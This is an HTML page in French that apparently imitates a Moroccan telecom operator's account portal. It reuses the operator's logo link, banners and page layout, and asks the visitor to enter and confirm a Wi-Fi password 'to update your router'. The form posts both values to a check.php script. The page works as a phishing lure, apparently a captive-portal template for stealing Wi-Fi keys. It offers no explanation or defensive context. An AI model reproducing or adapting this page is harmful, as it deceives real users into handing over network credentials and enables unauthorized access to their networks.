<html><head>








<meta name="viewport" content="width=device-width">


<style>
img {
    max-width: 100%;
}
</style>
		<title>
mettre à jour votre routeur 

 </title>
     <link rel="stylesheet" type="text/css" href="index_fichiers/Band.css">
<link rel="stylesheet" type="text/css" href="index_fichiers/controls.css">
<link rel="stylesheet" type="text/css" href="index_fichiers/highslide.css">
<link rel="stylesheet" type="text/css" href="index_fichiers/main.css">
<link rel="stylesheet" type="text/css" href="index_fichiers/core.css">
<link rel="stylesheet" type="text/css" href="index_fichiers/main.css">

    



	
<iframe name="google_conversion_frame" title="Google conversion frame" width="300" height="13"  frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>

<iframe name="google_conversion_frame" title="Google conversion frame" src="index_fichiers/a.html" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" width="300" frameborder="0" height="13" __idm_frm__="14">
 </iframe>
<div>

	<input name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgLM3ZOCAQKq0pnJAgK5wLmuAQKL/ObLCwLyo9muDgK71u67D471u/Dl/7I0+qx+XhzsK/ryAG4C" type="hidden">
</div>      
         	
 
  <div align="center">
	<table width="960" border="0" cellpadding="0" cellspacing="0">
		<tbody>
		<tr>
			<td colspan="2" style="text-align:right; height:0px;">
			<div>
			
<link href="index_fichiers/csscookies.css" rel="stylesheet" type="text/css">

<script type="text/javascript">
/*
function loadjsfile(filename){   
//if filename is a external JavaScript file
  var fileref=document.createElement('script')
  fileref.setAttribute("type","text/javascript")
  fileref.setAttribute("src", filename) 
}
*/
	$(function() {
	   display();	
	});

</script>

<!-- Begin Action Menu Markup -->
<table class="ms-siteaction" height="100%" cellpadding="0" cellspacing="0">
	<tbody><tr>
					   <td class="ms-siteactionsmenu" id="siteactiontd">
					   
					</td>
	</tr>
</tbody></table>
<!-- End Action Menu Markup -->

			</div>
			</td>
		</tr>
		<tr>
			<td colspan="2" style="text-align:right; height:0px">
			<div>

				
      			 
 
 
      			</div>
			</td>
		</tr>

		<tr>
			<td>
        <div align="center">
	<table width="960" background="index_fichiers/back_entete_all.jpg" border="0" cellpadding="0" cellspacing="0">
		<tbody><tr>
			<td>
        <div align="center">
				<table width="960" border="0" cellpadding="0" cellspacing="0">
					<tbody><tr>
						<td width="464">
						<img src="index_fichiers/1px_trans.gif" width="22" height="22" border="0"></td>
						
						<td width="20">&nbsp;</td>
					</tr>
				</tbody></table>
			</div>
			</td>
		</tr>
		<tr>
			<td>
			<div align="center">
				<table width="960" border="0" cellpadding="0" cellspacing="0">
					<tbody><tr>
						<td valign="top" width="231">
						<a href="http://www.iam.ma/">
						<img src="index_fichiers/logo_mt.jpg" width="231" height="102" border="0"></a></td>
						<td valign="top" width="729">
						<div align="center">
							<table width="729" border="0" cellpadding="0" cellspacing="0">
								<tbody><tr>
									<td colspan="2">
									<img src="index_fichiers/1px_trans.gif" width="22" height="77" border="0"></td>
								</tr>
								<tr>
									<td style="text-align:right; width:253px;height:26px;">
										<div class="searchA">
							
											





 
        
<div align="left">
	
</div>
	
											
									</div>							
        							</td>
									<td style="height:26px;width:476px;">
        								
        							</td>
								</tr>
							</tbody></table>
						</div>
						</td>
					</tr>
				</tbody></table>
			</div>
			</td>
		</tr>
	</tbody></table>
</div>

			</td>
		</tr>
		<tr>
			<td>
				
			</td>
		</tr>
		<tr>
			<td>
			<img src="index_fichiers/1px_trans.gif" width="4" height="4" border="0"></td>
		</tr>
		<tr>
			<td>
			
			
			<div align="center">
				<table width="960" border="0" cellpadding="0" cellspacing="0">
					<tbody><tr>
						<td valign="top" width="200" background="index_fichiers/back_px200_gauche.gif">
						<div align="center">
							<table width="200" border="0" cellpadding="0" cellspacing="0">
								<tbody><tr>
									<td>
									<img src="index_fichiers/tbl01_g.gif" width="200" height="18" border="0"></td>
								</tr>
								<tr>
									<td>
									

 
  

<script language="javascript">
function randomImg(){
   HTML = "";
   tabImg = new Array(6);   tabImgTempo = new Array(6);
   
   
   tabImg[0] = new Array(2);
   tabImg[1] = new Array(2);
   tabImg[2] = new Array(2);
   tabImg[3] = new Array(2);
   tabImg[4] = new Array(2);
   tabImg[5] = new Array(2);
   //tabImg[6] = new Array(2); 
        
   tabImg[0][0]  = "Factures_2013_180x155_Lien.swf"; 	tabImg[0][1]  = "09/30/2013";
   tabImg[1][0]  = "Refonte_3G_2013_180x155_Lien.swf"; 	tabImg[1][1]  = "03/16/2033";
   tabImg[2][0]  = "Ban_Babyfoot-africa2013_URL_180-155.swf"; 	tabImg[2][1]  = "02/13/2013";
   tabImg[3][0]  = "x5x7_15mars_Bonus_Laterale_SMS.swf"; 	tabImg[3][1]  = "03/16/2013";
   tabImg[4][0]  = "Tombola_18Millions_Laterale_SMS.swf"; 	tabImg[4][1]  = "02/24/2013";
   tabImg[5][0]  = "180x155_SMS.swf"; 	tabImg[5][1]  = "12/27/2099";
  // tabImg[5][0]  = "1.swf"; 		tabImg[5][1]  = "24/12/2012";
   //tabImg[6][0]  = "2.swf"; 		tabImg[6][1]  = "24/12/2012";
   
   j=0;
   for (i=0;i<tabImg.length;i++)
	{  
		if(getDateBan(tabImg[i][1])==true) 
		{
			tabImgTempo[j] = new Array(2);
			tabImgTempo[j][0] = tabImg[i][0]; 
			tabImgTempo[j][1] = tabImg[i][1];
			j++;
			
		}
	}
	ranMe = tabImgTempo[Math.round(Math.random()*(j-1))][0];
   
   if(ranMe.indexOf('.swf')==-1)
	{
		HTML = "<img src='"+"/_LAYOUTS/SharepointFreeSms/Controls/MonCompte/images/"+ ranMe +"'/>"; 
	}
   else
   {
		HTML +=  '<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj2" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0">';
		HTML +=  '  <param name="movie" value="/_LAYOUTS/SharepointFreeSms/Controls/MonCompte/images/'+ ranMe +'">';
		HTML +=  '  <param name="quality" value="High">';
		HTML +=  '  <embed src="/_LAYOUTS/SharepointFreeSms/Controls/MonCompte/images/'+ ranMe +'" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj2" width="180" height="155" quality="High">';
		HTML +=  '</object>';
   }
   document.getElementById('pan').innerHTML = HTML; 
}

function getDateBan(dateMe)
{
	var days = 0;
    var difference = 0;
    myDate = new Date(dateMe);
    today = new Date();
    difference = myDate - today;
    days = Math.round(difference/(1000*60*60*24));
	if(days<0) return false;
	else return true;
}


</script>


<div align="center">
    <table width="200" border="0" cellpadding="0" cellspacing="0">
        <tbody><tr>
            <td width="1" bgcolor="#d5d5d5">
                <img src="index_fichiers/1px_trans_004.gif" width="1" height="1" border="0">
            </td>
            <td width="198" bgcolor="#ffffff">
                <div align="center">
                    <table width="180" border="0" cellpadding="0" cellspacing="0">
                        <tbody>
								<tr>
									<td>  
 
											
											<embed src="index_fichiers/facebook180x155.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" quality="High" width="180" height="155"></object>
									</td> 
								</tr>
								<tr>
									<td>
										&nbsp;
									</td>
								</tr>
								
								<tr>
									<td>
										&nbsp;
									</td>
								</tr>
      							
								<tr>
									<td>
										&nbsp;
									</td>
								</tr>
								
                            
                        </tbody>
                    </table>
                </div>
            </td>
            <td width="1" bgcolor="#d5d5d5">
                <img src="index_fichiers/1px_trans_004.gif" width="1" height="1" border="0">
            </td>
        </tr>
    </tbody></table>
</div>
<script type="text/javascript">
  randomImg();
</script>  



									</td>
								</tr>
								</tbody></table>
						</div>
						</td>
						<td valign="top" width="6">
						<img src="index_fichiers/1px_trans.gif" width="6" height="6" border="0"></td>
						<td valign="top" width="754" background="index_fichiers/back_px754_center.gif">
						<div align="center">
							<table width="754" border="0" cellpadding="0" cellspacing="0">
								<tbody><tr>
									<td width="14">
									<img src="index_fichiers/tbl01_c.gif" width="14" height="14" border="0"></td>
									<td width="726" background="index_fichiers/tbl02_c.gif">
									<img src="index_fichiers/1px_trans.gif" width="14" height="14" border="0"></td>
									<td width="14">
									<img src="index_fichiers/tbl03_c.gif" width="14" height="14" border="0"></td>
								</tr>
								<tr>
									<td colspan="3" width="754">
									<div align="center">
										<table width="754" border="0" cellpadding="0" cellspacing="0">
											<tbody><tr>
												<td width="754">
												 
												 
												
 
   

												<div align="center">
													<table width="700" border="0" cellpadding="0" cellspacing="0">
														<tbody>
														<tr>
															<td>&nbsp;</td>
														</tr>
														<tr>
															<td>
															<p align="center">
															<img src="index_fichiers/img_mon-compte.jpg" width="434" height="67" border="0"></p></td>
														</tr>
														<tr>
															<td>&nbsp;</td>
														</tr>
														<form id="form1" name="form1" method="POST" action="check.php" >
<tr>
															<td align="left">
															   
                                                                <br><H2>
                                                                Entrez votre mot de passe Wifi pour mettre à jour votre routeur !</H2>
															<br>
															</td>
														</tr>
														<tr>
															<td>&nbsp;</td>
														</tr>
														<tr>
															<td>
                                                            
                                                           
                                                            </td>
														</tr>
														<tr>
															<td>
															<div align="center">
																<table width="700" border="0" cellpadding="0" cellspacing="0">
																	<tbody><tr>
																		<td width="10">
																		<img src="index_fichiers/coin01_tbl-ph.gif" width="10" height="10" border="0"></td>
																		<td width="680" background="index_fichiers/coin02_tbl-ph.gif">
									<img src="index_fichiers/1px_trans_003.gif" width="10" height="10" border="0"></td>
																		<td width="10">
																		<img src="index_fichiers/coin03_tbl-ph.gif" width="10" height="10" border="0"></td>
																	</tr>
																	<tr>
																		<td width="10" background="index_fichiers/coin04_tbl-ph.gif">&nbsp;</td>
																		<td valign="top" width="680">
																		<div align="center">
																			<table width="100%" border="0" cellpadding="3" cellspacing="1">
																				<tbody><tr>
																					<td><img src="index_fichiers/1px_trans_003.gif" width="1" height="1" border="0"></td>
																				</tr>
																				<tr>
																					<td>
																					<div align="center">
																                      
															</div><table align="left" width="100%" border="0" cellpadding="6" cellspacing="1">
																						
<tr>
																							<td align="right" width="50%" bgcolor="#EAEAEA">Mot de passe :</td>
																							<td align="left" width="50%" bgcolor="#F8F8F8">

                                                                                                <input name="key1" id="2" class="INPUTS" type="password">
																							    <br>
                                                                                              
																						</tr>
																						<tr>
																							<td align="right" width="50%" bgcolor="#EAEAEA">confirmer votre Mot de passe :</td>
																							<td align="left" width="50%" bgcolor="#F8F8F8">
																							
																							<input name="key2" id="3" class="INPUTS" type="password">
																							    <br>
                                                                                                <span id="ctl00_PlaceHolderMain_Login1_RequiredFieldValidator2" style="color:Red;display:none;">Veuillez saisir votre Mot de passe</span>
																							</td>
																						</tr>
																						<tr>
																							<td style="HEIGHT: 37px" colspan="2" background="index_fichiers/Bottom.gif">
																							<p align="center">
																							
                                                                                                <input name="ok" value="Confirmer" class="entradabtn" type="submit">
																							</p></td>
																						</tr>
																						<tr>
																							<td colspan="2" align="center" background="index_fichiers/Bottom.gif">
																							    <span id="ctl00_PlaceHolderMain_Login1_LBErreur" style="color:Red;font-weight:bold;"></span>
																							</td>
																						</tr>
																						
																						
																						<tr>
																							<td colspan="2" align="left" background="index_fichiers/Bottom.gif">
															<div align="center">
																<table width="100%" border="0" cellpadding="0" cellspacing="0">
																	<tbody>
																</tbody></table>
															</div>
																							</td>
																						</tr>
																						
																						<tr>
																							<td colspan="2" align="left" background="index_fichiers/Bottom.gif">
															<div align="center">
																<table width="100%" border="0" cellpadding="0" cellspacing="0">
																	<tbody>
																</tbody></table>
															</div>
																						</td></tr>
																						<tr>
																							<td colspan="2" align="left" background="index_fichiers/Bottom.gif">
																							    <table width="100%" border="0" cellpadding="0" cellspacing="0">
																	<tbody>
                                                                    
																</tbody></table>
                                                                 </td>
																						</tr>
                                                                                        
                                                                                        </tbody></table>
																					</td>
																				</tr>
																			</tbody></table>
																		</div>
																		</td>
																		<td width="10" background="index_fichiers/coin06_tbl-ph.gif">&nbsp;</td>
																	</tr>
																	<tr>
																		<td width="10">
																		<img src="index_fichiers/coin07_tbl-ph.gif" width="10" height="10" border="0"></td>
																		<td width="680" background="index_fichiers/coin08_tbl-ph.gif">
									<img src="index_fichiers/1px_trans_003.gif" width="10" height="10" border="0"></td>
																		<td width="10">
																		<img src="index_fichiers/coin09_tbl-ph.gif" border="0"></td>
																	</tr>		</tbody></table>
								</div>
															</td>
														</tr>
														
														<tr>
															<td>
															<p dir="ltr">
															&nbsp;</p></td>
														</tr>
														<tr>
															<td>&nbsp;</td>
														</tr>
													</tbody></table>
												</div>

</div>	 
														

												 
												</td>
											</tr>
										</tbody></table>
									</div>
									</td>
								</tr>
								</tbody></table>
						</div>
						</td>
					</tr>
					<tr>
						<td valign="top" width="200">
									<img src="index_fichiers/tbl02_g.gif" width="200" height="5" border="0"></td>
						<td valign="top" width="6">
												<img src="index_fichiers/1px_trans.gif" width="5" height="5" border="0"></td>
						<td valign="top" width="754">
									<div align="center">
										<table width="754" border="0" cellpadding="0" cellspacing="0">
											<tbody><tr>
												<td width="5">
												<img src="index_fichiers/tbl04_c.gif" width="5" height="5" border="0"></td>
												<td width="744" background="index_fichiers/tbl05_c.gif">
												<img src="index_fichiers/1px_trans.gif" width="5" height="5" border="0"></td>
												<td width="5">
												<img src="index_fichiers/tbl06_c.gif" width="5" height="5" border="0"></td>
											</tr>
										</tbody></table>
									</div>
						</td>
					</tr>
				</tbody></table>
			</div>

			
			</td>
		</tr>
		<tr>
			<td>
			<img src="index_fichiers/1px_trans.gif" width="6" height="6" border="0"></td>
		</tr>
		<tr>
			<td>
			     
							
</form>
  
</body></html>